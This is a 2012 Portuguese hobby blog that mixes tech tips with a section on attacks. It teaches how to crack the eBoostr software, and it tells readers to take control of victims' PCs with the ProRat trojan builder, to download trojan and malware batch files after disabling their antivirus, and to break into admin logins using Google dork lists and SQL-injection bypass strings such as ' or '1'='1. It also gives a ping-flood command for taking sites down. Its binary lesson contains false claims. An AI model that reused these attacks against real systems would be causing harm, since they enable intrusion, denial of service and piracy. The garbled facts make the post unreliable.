Rádio 24hrs

sábado, 20 de outubro de 2012

Noções Básicas de Programação

Linguagem Binária
 
Antes de começarmos a falar da linguagem binária, é importante saber que ela pertence à Linguagem C (ou Linguagem dos Computadores). É considerada umas das mais fáceis dentre tantas difíceis. Constitui um alfabeto completo representados em números (0 e 1) e que cada número, constitui um bit. Cada letra da L.Binária é uma combinação de 8 números (de 0 e 1) onde não existe espaço, nenhum tipo de ponto ou sinal, apenas 0 e 1. O conjunto de 8 bits é denominado um byte.
 
Alfabeto de uma forma fácil de se decorar:
 
A 01000001
B 01000010                                  Com 4 zeros após 01 (apenas 3 letras)
C 01000011
        
         D 01000100 
         E 01000101                           Com 3 zeros após 01 (4 letras)
         F 01000110
        G 01000111
                 
                 H 01001000 
                  I 01001001 
                  J 01001010                    Com 2 zeros após 01 (8 letras)
                 K 01001011
                 L 01001100
                M 01001101
                N 01001110
                O 01001111
                        
                         P 01010000
                         Q 01010001 
                         R 01010010
                         S 01010011              Com 1 zero após 01 (10 letras)
                         T 01010100
                         U 01010101
                         V 01010110 
                        W 01010111
                         X 01011000
                         Z 01011001
 
ATENÇÃO: existe binário com outros números (2.3.4 ...9) mas é um outro assunto e de nível bem mais avançado !!
 
Achou difícil ?? Tente fazer seu nome, com isso você estará desenvolvendo capacidade suficiente de memorização para cursos de programação.

Transformando um Pen Drive em uma Memória RAM

Este "novo" método de transformar um Pen Drive em uma Memória RAM vem desde 2007 com a criação do programa eBoostr . Mas óbvio que se você num for mané, não vai colocar um Pen Drive de 1 ou 2 GB pra "substituir" sua memória RAM, recomendo de 4 GB pra cima; enfim, vamos ao que interessa.

Dados:

Nome do Programa: eBoostr
Fabricante: eBoostr.com
Sistema Operacional: Windows XP, 2000 ou 2003
Estilo: Otimização do Sistema
Ano de Lançamento: 2007

O eBoostr é um aplicativo que permite a utilização de um drive adicional (memória Flash ou HD) como uma camada adicional de otimização de performance do cache. Com eBoostr, o tempo de carregamento de seu sistema operacional, bem como dos aplicativos, é muto mais rápido, graças ao mecanismo de cacheamento inteligente. eBoostr oferece uma solução simples e relativamente barata para o problema de insuficiência de RAM, pois você não precisará adquirir pentes adicionais de memória.

Embora esse projeto exista, é necessário Crackeá-lo, acompanhe os passos abaixo:

1º) Instale o programa e feche o instalador
2º) Caso o programa abra após a instalação feche o mesmo
Vá em Iniciar ==> Executar e digite net stop eboostrsvc ==> Enter

3º) Copie os dois arquivos da pasta Cracked para a pasta de instalação do programa (Geralmente “C:\Arquivos de Programas\eBoostr”), substituindo os originais.
4º) Vá em Iniciar ==> Executar e digite net start eboostrsvc ==> Enter
5º) Cracked Finaly.
 OBS: Meu sistema operacional não é qualquer um dos acima citados, portanto não poderei fazer vídeo aula. Peço a vocês que procurem por outras pessoas no youtube.

LINK DO DOWNLOAD DO eBoostr:
http://www.4shared.com/zip/GSBuVzl2/eBoostr.html

Aumentando a Velocidade

Download
 
Muita gente está cansada de ter sua velocidade de download reduzida ou controlada pelo seu provedor. Uma maneira muito simples de aumentar sua velocidade é seguir os passos abaixo:
 
1ºPasso:
Vá em, menu iniciar, executar, regedit
 
2ºPasso:
Agora procure:  HKEY_CURRENT_USER, em seguida, Software ==> Microssoft ==> Windows ==> Current Version ==> Internet Settings.
 
3ºPasso:
Ainda em Internet Settings, clique com o botão direito do mouse, vá em novo, depois em valor dword, apague o campo selecionado de azul e digite: MaxConne0000000actionsPer1_0Server=Dword:


 
4ºPasso:
Repita todo o processo do passo 3 só que agora digite:

MaxConnectionsPerServer=Dword:0000000a
 
OBS: funciona mesmo !! Foi testado e aprovado por AGM Hacker e
[HR]-Expert!. Mais informações procurem por agm.hacker@gmail.com e/ou hacker_expert180@hotmail.com; para esclarecer suas dúvidas.
Com essas informações vai aumentar sua velocidade de download consideravelmente.
 

Internet
 
Pessoal, método funcional e eficaz. Não que vá dobrar sua velocidade da internet, mas vai aumentar um pouco que já é alguma coisa !! Testei apenas em Windows 7 e XP, qualquer dúvida, esclarecerei logo. Preciso que façam o que se pede:

 
1º) no menu iniciar, vá em executar e em seguida, digite  gpedit.msc;
2º) vá em modelos administrativos, depois redes, agendador de pacotes QoS
3º) clique em limitar largura de banda reservável;
4º) se a opção não configurado estiver ativa, desatíve-a e marque a opção habilitado;
5º) logo abaixo, você verá limite de largura de banda; ponha em 0%;
6º) clique em aplicar e depois ok, em seguida, reinicie o PC e veja se algo mudou ou não.
 
 
Créditos; AGM Hacker e [HR]-Expert!


(fonte: http://agmhacker.blogspot.com.br/?view=classic)
 
 

sexta-feira, 19 de outubro de 2012

Roteadores

Segurança
 
O problema de muita gente que usa e abusa de sua internet é que pensam que nunca vão ter problemas com a questão dos ataques de hackers. Até em cidades pequenas pode haver um "Anonymous". A questão é, você está protegido ? Em pleno século XXI, Era Tecnológica, todo cuidado é pouco principalmente quando se trata de rede de internet.
Irei lhes apresentar algumas das formas mais requeridas e necessárias para sua segurança em particular.
 
1º Passo:
Abra o navegador e aponte para o endereço padrão do roteador, normalmente é algum destes:
http://192.168.1.1
http://192.168.0.1
http://10.1.1.1
http://10.0.0.1

2ºPasso:
Informe o login e senha padrão que normalmente são alguns desses itens:

login: admin senha: admin
login: em branco senha: admin
login: admin senha: 12345
login: root senha: admin
login: root senha: root
login: root senha: 12345
login: em branco senha: 12345


Se você conseguir entrar, parabéns, acabou de descobrir sua 1ª falha na rede, você está vulnerável !! Agora, na página de configurações do seu roteador, procure, para quem usa roteadores da Greatek, "gerenciamento" e em seguida, "senha"  troque ambos os campos e após ter feito isso, esses mesmos campos ficarão novamente em branco, sinalizando que a operação de troca de usuário e senha foi concluída com sucesso. Para quem não usa também, tentem fazer isso, ou procure logo "senha".

3ºPasso:
Bom, agora que você está dentro das configurações do roteador, segue um pequena listinha de ítens básicos de segurança que deve ser verificada no roteador:




  • Mudar a senha padrão do roteador;
  • No caso se tiver acesso Wireless, colocar segurança como WPA2 e uma senha para acesso;
  • Outra opção que eu gosto é desabilidar o SSID Broadcast, isso faz com que o ID do wireless não aparece naquela lista de redes sem fio disponíveis, você terá que clicar no botão acessar uma rede sem fio oculta e colocar o ID e senha, o lado bom é que ninguem vai saber que sua rede sem fio existe;
  • Ligar o Firewall do roteador;
  • Desabilitar acesso remoto (Remote Management) do roteador, assim só os computadores da rede interna poderão acessá-lo;
  • Habilitar o bloqueio de acessos anônimos (Block Anonymous Internet Requests) ;
  • Desabilitar UPnP;
  • Desabilitar IGMP Proxy;
  • Desabilitar Administração via Wireless ou WLAN (Management via WLAN) ;
  • Atualizar o firmware (conjunto de instruções operacionais programadas diretamente no hardware de um equipamento eletrônico) do roteador para a última versão;
  • Tente não entrar em páginas de hacker, pornografia, pirataria, e sair clicando em tudo, estas páginas são conhecidas por conter material malicioso, vírus (trojan, malware, etc.)
  • Jamais entregue a senha do seu roteador para os vizinhos e se caso quiser entregar, mude-a rapidamente após alguns minutos ou algumas horas.
====================================================================

sábado, 23 de junho de 2012

5º - Fibra Ótica

Feitas de sílica e germânio, fibras óticas transmitem dados pela luz



Diâmetro dos filamentos chega a 1/10 da espessura de um fio de cabelo
Fibra ótica (Foto: Divulgação)As fibras óticas levam as informação por meio de feixes luminosos 










Ela é extremamente fina, com incríveis 125 mícrons de diâmetro, ou melhor, 0,125 milímetros, o que equivale a um décimo da largura de um fio de cabelo. Trata-se da fibra ótica, cujo poder de transmissão de dados é inversamente proporcional ao seu tamanho, permitindo trafegar por meio da luz uma quantidade de informações maior do que qualquer outro meio tecnológico. Seu surgimento está atrelado à criação do laser, na década de 50, sendo que uma das primeiras aplicações da fibra ótica não foi propriamente na comunicação, e sim na medicina, em procedimentos endoscópicos.Como explica o professor, a fibra ótica é composta por materiais extremamente transparentes à luz, no caso um vidro especial feito à base de sílica, que sofre um processo intenso de purificação para ser utilizado, principalmente, nas telecomunicações. “O vidro comum apresenta impurezas que absorvem a luz. Para transmissões a longas distâncias, é preciso que esse vidro tenha um alto grau de pureza para disseminação dos feixes luminosos”, lembra o Hugo.Mas como a informação trafega por filamentos tão finos? A fibra ótica nada mais é do que um meio de propagação de um sinal luminoso de infravermelho (onda eletromagnética), que não é visível ao olho humano. “A onda se propaga ao longo da fibra, funcionando como uma portadora, que carrega informações. Essa onda pode ter várias frequências, possibilita transmitir dados com finalidades diferentes. Entretanto, o sinal luminoso pode também atuar no campo do visível, sendo empregado como fonte de iluminação em alguns casos”, explica o professor Hugo Enrique Figueroa, do Departamento de Micro-onda e Óptica da Faculdade de Engenharia Elétrica e de Computação da Universidade Estadual de Campinas (Unicamp).
Para que a luz possa ser “canalizada”, e trafegar por longas distâncias, as fibras óticas são compostas por duas partes: o núcleo, formado de sílica e germânio, e a casca, composta somente por sílica, sendo que ambas as camadas possuem índices de refração diferentes. “O núcleo apresenta características distintas da parte externa, visto que o seu índice de refração deve ser maior do que o da casca. Na verdade, a luz é aprisionada dentro do núcleo e, dessa forma, ela percorre distâncias enormes”, ressalta o professor.
No caso das telecomunicações, o feixe luminoso que trafega na fibra é carregado de informações. Como a luz é uma onda eletromagnética, possui diversas frequências, sendo que cada uma delas pode carregar um tipo diferente de dado. Antes de entrar no laser, a informação é codificada, o que significa dizer,  que ocorre uma descrição elétrica da informação. Após codificada, acontece a modulação, que é como essa informação é transformada em luz no laser, que emite, assim, o feixe luminoso.
“A luz que transita pela fibra é denominada de portadora. Em média, uma fibra pode ter até 50 km de comprimento. Quando temos distâncias muito grandes, a cada 50 km de fibra, por exemplo, temos um equipamento que atua como um estágio de regeneração. É uma espécie de repetidora, tratando o sinal que chega atenuado devido à longa distância, e o regenera, amplificando-o, compensando algumas deformações do sinal, jogando-o novamente em outro pedaço de fibra. Em conexões submarinas, esses equipamentos possuem baterias que duram de 20 a 30 anos”, ressalta Hugo.

sábado, 5 de maio de 2012

4º - Arte de Ataque!

Obtendo controle sobre sua vítima

Usando o ProRat v1.9

AVISO: NÃO ME RESPONSABILIZO PELO SEUS ATOS.

Olá forasteiros, 

Abaixo está uma vídeo-aula de como invadir outro PC usando o ProRat v1.9. o download do programa você encontra logo abaixo do víde.








ou

Disponibilizando aqui o link pra o download do ProRat v1.9:


Gente peço a vocês que forem usar o ProRat, que tomem cuidado! Façam escaneamento completo do sistema semanal ou diário. O ProRat não é apenas um programa Cracker, ele é um criador de trojans, tomem cuidado.

==============================================

Usando a Fábrica de Vírus

Olá pessoal, a vídeo-aula abaixo é mostrando como se faz um virus. A Fábrica de Vírus é um projeto do Pedro Barros cujo não conheço mas posso elogiá-lo pelo seu magnífico trabalho.




ou 

 http://www.youtube.com/watch?v=zJvrP17aXew 

E como dito no vídeo acima, aqui está o link de download da pasta de Vírus. Porém, muito cuidado quando for usá-los, use-os apenas quando for necessário.


Senha para descompactá-los:
01000011  

 OBS: A Fábrica de Vírus funciona em Windows 7, basta extrair as pastas para a Área de Trabalho e instalar o pacote de compatibilidade; desconheço em relação ao Vista.


================================================================

Descontraindo 
Abaixo está algumas coisas legais, com ou sem vídeo-aula, mas está explicando de uma forma compreensível. 
:D


Sacaneando sua vítima

EDITADO: DEVIDO A RECLAMAÇÕES DE QUE ESTAVA DANDO VÍRUS NO FINAL DO DOWNLOAD, RESOLVI POR  OS CÓDIGOS DO TROJAN E DO MALWARE NUMA PASTA SÓ E ZIPADA.  OS LINKS DO TROJAN E DO MALWARE SÃO OS MESMOS.
DESATIVEM O AUTOSANBOX (SÓ PRA QUEM TEM O AVAST ! )


Criando um Trojan 
 Olá gente,alguns usuários reclamaram de que tava dando virus quando entravam no blog, para visualizar o código para fazer um Trojan, faça o download abaixo. Relaxem, não vai acusar virus algum, eu salvei o arquivo como texto em um bloco de notas. Siga as intruções abaixo.


Após ter feito o download, salve o arquivo novamente.

PS: Não se esqueção de salvar com o final ".bat".
Ex:
trojan.bat
musica.bat
vc.bat
senha de descompactação: 01000011
Se o seu Anti-Vírus for bom, ele irá detectar um trojan, se não, não se preocupem, o trojan só fará mal a vocês se executarem. Recomendo o Avast. 
Para fazer o vírus com sucesso, desativem o Anti-Vírus.

=================================================================

Construindo um Malware

Olá pessoal, repetindo o mesmo processo do tópico acima:
 
 
Após  o download, salve o arquivo novamente, com ".bat". 

Ex: 
mal.bat
haha.bat

senha de descompactação: 01000011
 
Se o seu Anti-Vírus for bom, ele irá detectar um malware, se não, não se preocupem, o malware só fará mal a vocês se executarem. Recomendo o Avast.
Para fazer o vírus com sucesso, desativem o Anti-Vírus.

=================================================================

 Invasão de Sites


Por Strings

Olá Pessoal, neste tópico vamos aprender a invadir um site pelo Google. Siga os passos abaixos :D

1º - Use esses links no Google para pesquisar páginas de sites diretamente ligada á página do login de um ADMIN:

==> Strings de pesquisa no google:
 
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp

2º - Use essas Strings de acesso para por na tela do Login de um ADMIN:


b' or ' 1='
' or '1
' or '
' or 'a '=' a
') or ('a'='a
1' or '1'='1

Só um lembrete, não vai ser fácil não galera, vocês que se enteressam por invadir sites, tem que ralar muito! Eu particularmente já invadi vários; é recomendado um camuflador de IP's.
Nem todos os Sites que contém a página de ADMIN, vão aceitar essas strings. Agora é bom lembrar que, pra que você ser um bom hacker, tem que lembrar de seus princípios! Se caso conseguir invadir sites, comunique ao admin para que possa corrigir o erro.


 =================================================================

Por Ping 

Vá no menú iniciar; executar; cmd:


Ok! Depois digite:  ping (+ o site escolhido)
**Enter 
 Aparecerá essa imagem:
 
 


Galera, reparem no seguinte dado:
Pacotes: Enviados = 4, Recebidos = 4, Perdidos = 0 <0% de perda>
Tudo indica que se eu dar um comando, ele vai atacar o site. Evitem sites que contenham ".org", além de difíceis, são quase insuportáveis. Usem sempre um ou mais Camufladores de IP. 

Se o site escolhido por você apresentar em seus dados: "Esgotado o tempo limite do pedido" que fica onde está "Resposta de 186.192.82.163: bytes=32 (etc)", repitão o processo. Feito isso, agora verifiquem, no dado do ping acima (Pacotes) se a perda sofreu alguma alteração. Ela deve ficar sempre em 0% !! Se caso estiver em 0%, digite agora:

ping -f-L10000000 -t (+ o Ip do site)

 **Enter

Com mais centenas dessas mensagens de Respostas, uns 5 ou 6 PC's e muita paciência, vocês conseguem derrubar um site. Eu, obviamente não sou louco de invadir sozinho sites de empresas de grande porte, como a Globo e aconselho a vocês a não mexerem com sites de grandes empresas como a Microsoft, Globo, Google, etc. É bom lembrar que, usar um camuflador de IP não significa que você está completamente seguro, pois os donos dos sites que tu atacou, podem te achar; vai ser difícil é claro, mas é aconselhável que use o Camuflador de IP sempre que for acessar ate a internet. Sendo por qualquer navegador.

É CRIME, PENSE DUAS VEZES.